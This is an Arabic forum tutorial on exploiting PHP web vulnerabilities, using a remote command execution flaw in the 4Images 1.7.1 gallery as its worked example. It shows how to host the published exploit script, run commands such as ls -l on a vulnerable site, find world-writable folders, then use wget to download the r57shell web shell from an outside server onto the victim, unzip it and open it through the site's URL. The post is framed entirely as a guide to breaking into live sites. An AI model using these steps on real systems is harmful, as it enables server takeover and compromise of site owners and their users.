طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,

طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,

الـسلام عليكم ورحمـة الله وبــركاته

بندخل بالموضوع بدون مقدمات ( بالعربي ماعندي شي اقوله ) نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

طيب اول شي كيف تعرف انها php ?

بتـلقاء اول الكـود حق الثغـره مكتـوب كذا


كود PHP:
كود:
<?php
طيـب آستغلال الثغـرات هذي تـحفظهـا بآمتداد php وتـرفعه على موقـع , مثـل ليوكس او غيره ,

طيـب بناخـذ ثغرة


كود:
كود:
4Images <= 1.7.1 remote commands execution through arbitrary local

الثــغره في البــوٍوٍم الصـور 4Images الاصــدار : 1.7.1

طيــب هــذآ سورس الثغــره الي نـزل في مـواقع السكـيورتي ,


http://www.milw0rm.com/exploits/1533

زي ماشفنـا في بـداية الكـود <?php اوكـ, الحـين احـفظ الثغـره في جهـازك وانا سميتها كذا saudi.php

لاحظ الامتداد الي حطـيته php ورح ارفــعها على موقع يقبل هالامتــداد , وانـا رفعتـها على مـوقع وهـذا رابط الثغـره ,


http://www.web4new.com/gallery/saudi.php

طبـعا الطـلبات واضـحه ,,

اول خيــآر : رابــط المـوقع واحط مثــال هو , www.sitename.com

ثــآني خيآر : آســم المجلد ع المـوٍوٍقـع , وحــاط مثـال هو /4images/ or just او غيـره

ثـالث خيـآر : (آمــر لينكس او ويندوز) وحــاط مثال هـو specify a command ("cat config.php" ,

وامـر لينكس مهــمه جـدا والكل لازم يعـرفها او يآخذ نبذه بسيـطه عنـها عشـان يعرف يتعـامل مع هالنظام ,



طبعا احنا اخذنا الخيارات المهمه اول ثلاث خيارات الي حـاط عليــها * نجمه ,

طيب بنطـبق على مـوقع مصـاب ونــشوف


نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

زي ماشفنا في الصـوره كتـبت الامـر ls -l وهو لـعرض الملفات مـع تصاريحها ,

نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي


وهـذي هي المـلفات طيــب الحيـن نشوفلنا ملف تصريحه 777 ومـلف data تصريحه 777 زي مانشـوف في الصوره

بس الملف الي احنا علي تصريحه 777 اكتـب بدال الامر ls -l الامر هذا which wget وبيقــولك !/usr/bin/wget

يعنــي تقــدر تـرفع طيب تمـام الحيــن نرفع لنـا شل ,


نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

زي ماشفــناء في الصـوره كتـبت كـذا

كود:
wget http://www.web4new.com/gallery/r57shell.zip

wget = آمــر الرفع والرابــط رآبـط الشل ,

وآظغــط (GO)

طـيب الحيــن عشــان تتآكد انه ارتـــفع روح واكتـب الامر ls -l وبتـشوفه مع المـلفات ,


نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

كـل شي تمام طيب الحين تفـك الظغـط عن الشـل ,

نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي


unzip = امـر فك الظـغط

r57shell.zip = المـلف الي رفعناه ,


نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

ولاحـظ الصوره بعد ماظغطنــاء go , فـك الظغـط , وطـلع الملف r57shell.php ,

وهــذي صـوره توضــح ..


نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

خــلاص الحـين كل شي تــمام تشــوف مســارك ويـن ,

نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

pwd : امـر يحدد مسـارك ع السيرفر ,

نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

زي ماشفـنا في الصــوره عطانا المسـار الي احنـاء فيه ,

كود:
كود:
/home/mubailes/public_html/main
فــي المجلد الرئيسي تبع الموقع في مجلد main يعني هنا بيكون الشل

www.xxxx.com/main/r57shell.php ,

وهــذي الصــوره بعد دخــولنا ع الشــل ,


نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

وبكــذا ان شاء الله نكون عـرٍرٍفنا كيف نستغـل ثغـرات الـ php واخذنـا الثغـره هذي كمثــال ,
واكيــد كل ثغـره يفرق استثماره عن الثاني وان شاء الله يكون الـدرس واضـح واي سـؤال انا حاظـر ,

والسـلام عليكم ورحمة الله وبـركاته ,, نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي